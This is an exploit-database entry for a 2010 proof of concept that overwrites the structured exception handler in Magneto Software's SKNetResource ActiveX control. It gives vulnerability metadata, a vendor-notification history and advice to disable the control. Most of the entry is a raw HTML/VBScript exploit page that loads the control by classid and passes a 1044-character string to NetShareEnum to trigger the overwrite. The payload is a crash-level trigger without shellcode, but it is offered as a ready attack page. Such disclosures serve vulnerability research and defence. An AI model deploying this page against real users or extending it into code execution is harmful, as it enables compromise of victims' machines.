Magneto Software Net Resource ActiveX NetShareEnum SEH Overwrite POC

vendor:

SKNetResource

by:

s4squatch

7,6

CVSS

HIGH

SEH Overwrite

119

CWE

Product Name: SKNetResource

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Magneto Software Net Resource ActiveX NetShareEnum SEH Overwrite POC

This exploit is related to the Magneto Software Net Resource ActiveX control. It is possible to overwrite the Structured Exception Handler (SEH) by passing a long string of 1044 'A' characters as the first argument to the NetShareEnum function. This can lead to arbitrary code execution.

Mitigation:

The vendor has not released a patch for this vulnerability. The best mitigation is to disable the vulnerable ActiveX control.

Source

Exploit-DB raw data:

<html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX NetShareEnum SEH Overwrite POC
'Discovered by:  s4squatch
'Site:  www.securestate.com
'Date Discovered: 02/11/10
'www:  http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'Download:  http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'SKNetResource.ocx
'Function NetShareEnum ( ByVal strServerName As String ,  ByRef pvarNetShareInfo As Variant ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"

'SEH overwrite
arg1=String(1044, "A")
arg2="defaultV"

target.NetShareEnum arg1 ,arg2 

</script>